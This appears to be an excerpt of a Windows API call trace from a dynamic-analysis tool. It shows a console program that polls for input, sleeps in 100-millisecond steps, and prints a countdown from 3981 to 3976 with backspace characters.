[0103.453] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0103.453] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc3
[0103.453] Sleep (dwMilliseconds=0x64)
[0103.562] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0103.563] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc3
[0103.563] Sleep (dwMilliseconds=0x64)
[0103.671] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0103.671] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc3
[0103.671] Sleep (dwMilliseconds=0x64)
[0103.780] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0103.781] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc3
[0103.781] Sleep (dwMilliseconds=0x64)
[0103.889] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0103.890] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc3
[0103.890] Sleep (dwMilliseconds=0x64)
[0103.999] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0103.999] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc3
[0103.999] Sleep (dwMilliseconds=0x64)
[0104.108] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0104.108] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc3
[0104.108] Sleep (dwMilliseconds=0x64)
[0104.217] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0104.217] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc3
[0104.217] Sleep (dwMilliseconds=0x64)
[0104.326] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0104.327] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc4
[0104.327] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083981") returned 8
[0104.327] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0104.327] __iob_func () returned 0x757a2900
[0104.327] _fileno (_File=0x757a2920) returned 1
[0104.327] _errno () returned 0x5507d8
[0104.327] _get_osfhandle (_FileHandle=1) returned 0x4c
[0104.327] _errno () returned 0x5507d8
[0104.327] GetFileType (hFile=0x4c) returned 0x2
[0104.327] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0104.327] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0104.327] lstrlenW (lpString="\x08\x08\x08\x083981") returned 8
[0104.327] GetConsoleOutputCP () returned 0x1b5
[0104.327] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083981", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0104.327] GetConsoleOutputCP () returned 0x1b5
[0104.328] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083981", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083981", lpUsedDefaultChar=0x0) returned 8
[0104.328] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0104.328] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0104.328] Sleep (dwMilliseconds=0x64)
[0104.435] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0104.436] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc4
[0104.436] Sleep (dwMilliseconds=0x64)
[0104.546] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0104.546] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc4
[0104.546] Sleep (dwMilliseconds=0x64)
[0104.654] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0104.654] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc4
[0104.654] Sleep (dwMilliseconds=0x64)
[0104.763] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0104.763] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc4
[0104.764] Sleep (dwMilliseconds=0x64)
[0104.872] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0104.872] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc4
[0104.872] Sleep (dwMilliseconds=0x64)
[0104.990] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0104.990] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc4
[0104.991] Sleep (dwMilliseconds=0x64)
[0105.091] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0105.091] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc4
[0105.091] Sleep (dwMilliseconds=0x64)
[0105.200] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0105.200] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc4
[0105.200] Sleep (dwMilliseconds=0x64)
[0105.309] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0105.309] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc5
[0105.309] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083980") returned 8
[0105.309] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0105.310] __iob_func () returned 0x757a2900
[0105.310] _fileno (_File=0x757a2920) returned 1
[0105.310] _errno () returned 0x5507d8
[0105.310] _get_osfhandle (_FileHandle=1) returned 0x4c
[0105.310] _errno () returned 0x5507d8
[0105.310] GetFileType (hFile=0x4c) returned 0x2
[0105.310] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0105.310] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0105.310] lstrlenW (lpString="\x08\x08\x08\x083980") returned 8
[0105.310] GetConsoleOutputCP () returned 0x1b5
[0105.310] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083980", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0105.310] GetConsoleOutputCP () returned 0x1b5
[0105.310] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083980", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083980", lpUsedDefaultChar=0x0) returned 8
[0105.310] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0105.311] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0105.311] Sleep (dwMilliseconds=0x64)
[0105.418] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0105.419] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc5
[0105.419] Sleep (dwMilliseconds=0x64)
[0105.527] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0105.528] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc5
[0105.528] Sleep (dwMilliseconds=0x64)
[0105.637] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0105.637] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc5
[0105.637] Sleep (dwMilliseconds=0x64)
[0105.746] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0105.746] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc5
[0105.746] Sleep (dwMilliseconds=0x64)
[0105.855] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0105.855] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc5
[0105.855] Sleep (dwMilliseconds=0x64)
[0105.964] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0105.964] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc5
[0105.964] Sleep (dwMilliseconds=0x64)
[0106.073] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0106.074] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc5
[0106.074] Sleep (dwMilliseconds=0x64)
[0106.189] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0106.189] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc5
[0106.189] Sleep (dwMilliseconds=0x64)
[0106.292] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0106.292] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc6
[0106.292] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083979") returned 8
[0106.292] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0106.292] __iob_func () returned 0x757a2900
[0106.292] _fileno (_File=0x757a2920) returned 1
[0106.292] _errno () returned 0x5507d8
[0106.292] _get_osfhandle (_FileHandle=1) returned 0x4c
[0106.292] _errno () returned 0x5507d8
[0106.292] GetFileType (hFile=0x4c) returned 0x2
[0106.292] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0106.292] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0106.292] lstrlenW (lpString="\x08\x08\x08\x083979") returned 8
[0106.292] GetConsoleOutputCP () returned 0x1b5
[0106.293] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083979", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0106.293] GetConsoleOutputCP () returned 0x1b5
[0106.293] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083979", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083979", lpUsedDefaultChar=0x0) returned 8
[0106.293] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0106.293] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0106.293] Sleep (dwMilliseconds=0x64)
[0106.401] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0106.401] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc6
[0106.401] Sleep (dwMilliseconds=0x64)
[0106.510] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0106.510] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc6
[0106.510] Sleep (dwMilliseconds=0x64)
[0106.619] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0106.620] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc6
[0106.620] Sleep (dwMilliseconds=0x64)
[0106.729] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0106.729] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc6
[0106.729] Sleep (dwMilliseconds=0x64)
[0106.838] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0106.838] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc6
[0106.838] Sleep (dwMilliseconds=0x64)
[0106.947] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0106.947] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc6
[0106.947] Sleep (dwMilliseconds=0x64)
[0107.078] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0107.078] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc6
[0107.078] Sleep (dwMilliseconds=0x64)
[0107.205] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0107.205] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc6
[0107.205] Sleep (dwMilliseconds=0x64)
[0107.306] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0107.306] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc7
[0107.306] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083978") returned 8
[0107.306] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0107.307] __iob_func () returned 0x757a2900
[0107.307] _fileno (_File=0x757a2920) returned 1
[0107.307] _errno () returned 0x5507d8
[0107.307] _get_osfhandle (_FileHandle=1) returned 0x4c
[0107.307] _errno () returned 0x5507d8
[0107.307] GetFileType (hFile=0x4c) returned 0x2
[0107.307] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0107.307] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0107.307] lstrlenW (lpString="\x08\x08\x08\x083978") returned 8
[0107.307] GetConsoleOutputCP () returned 0x1b5
[0107.307] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083978", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0107.307] GetConsoleOutputCP () returned 0x1b5
[0107.307] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083978", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083978", lpUsedDefaultChar=0x0) returned 8
[0107.307] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0107.307] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0107.307] Sleep (dwMilliseconds=0x64)
[0107.493] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0107.494] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc7
[0107.494] Sleep (dwMilliseconds=0x64)
[0107.664] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0107.665] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc7
[0107.665] Sleep (dwMilliseconds=0x64)
[0107.852] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0107.852] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc7
[0107.852] Sleep (dwMilliseconds=0x64)
[0108.039] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0108.039] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc7
[0108.039] Sleep (dwMilliseconds=0x64)
[0108.234] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0108.234] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc8
[0108.234] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083977") returned 8
[0108.234] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0108.234] __iob_func () returned 0x757a2900
[0108.234] _fileno (_File=0x757a2920) returned 1
[0108.234] _errno () returned 0x5507d8
[0108.234] _get_osfhandle (_FileHandle=1) returned 0x4c
[0108.234] _errno () returned 0x5507d8
[0108.234] GetFileType (hFile=0x4c) returned 0x2
[0108.234] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0108.235] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0108.235] lstrlenW (lpString="\x08\x08\x08\x083977") returned 8
[0108.235] GetConsoleOutputCP () returned 0x1b5
[0108.235] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083977", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0108.235] GetConsoleOutputCP () returned 0x1b5
[0108.235] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083977", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083977", lpUsedDefaultChar=0x0) returned 8
[0108.235] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0108.235] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0108.235] Sleep (dwMilliseconds=0x64)
[0108.413] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0108.413] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc8
[0108.413] Sleep (dwMilliseconds=0x64)
[0108.600] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0108.601] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc8
[0108.601] Sleep (dwMilliseconds=0x64)
[0108.788] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0108.788] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc8
[0108.788] Sleep (dwMilliseconds=0x64)
[0108.944] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0108.944] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc8
[0108.944] Sleep (dwMilliseconds=0x64)
[0109.131] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0109.131] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc8
[0109.131] Sleep (dwMilliseconds=0x64)
[0109.318] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0109.319] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc9
[0109.319] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083976") returned 8
[0109.319] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0109.319] __iob_func () returned 0x757a2900
[0109.319] _fileno (_File=0x757a2920) returned 1
[0109.319] _errno () returned 0x5507d8
[0109.319] _get_osfhandle (_FileHandle=1) returned 0x4c
[0109.319] _errno () returned 0x5507d8
[0109.319] GetFileType (hFile=0x4c) returned 0x2
[0109.319] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0109.319] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0109.319] lstrlenW (lpString="\x08\x08\x08\x083976") returned 8
[0109.319] GetConsoleOutputCP () returned 0x1b5
[0109.319] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083976", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0109.319] GetConsoleOutputCP () returned 0x1b5
[0109.320] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083976", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083976", lpUsedDefaultChar=0x0) returned 8
[0109.320] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0109.320] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0109.320] Sleep (dwMilliseconds=0x64)
[0109.505] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0109.506] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc9
[0109.506] Sleep (dwMilliseconds=0x64)
[0109.692] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0109.693] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc9
[0109.693] Sleep (dwMilliseconds=0x64)
[0109.880] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0109.880] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc9
[0109.880] Sleep (dwMilliseconds=0x64)
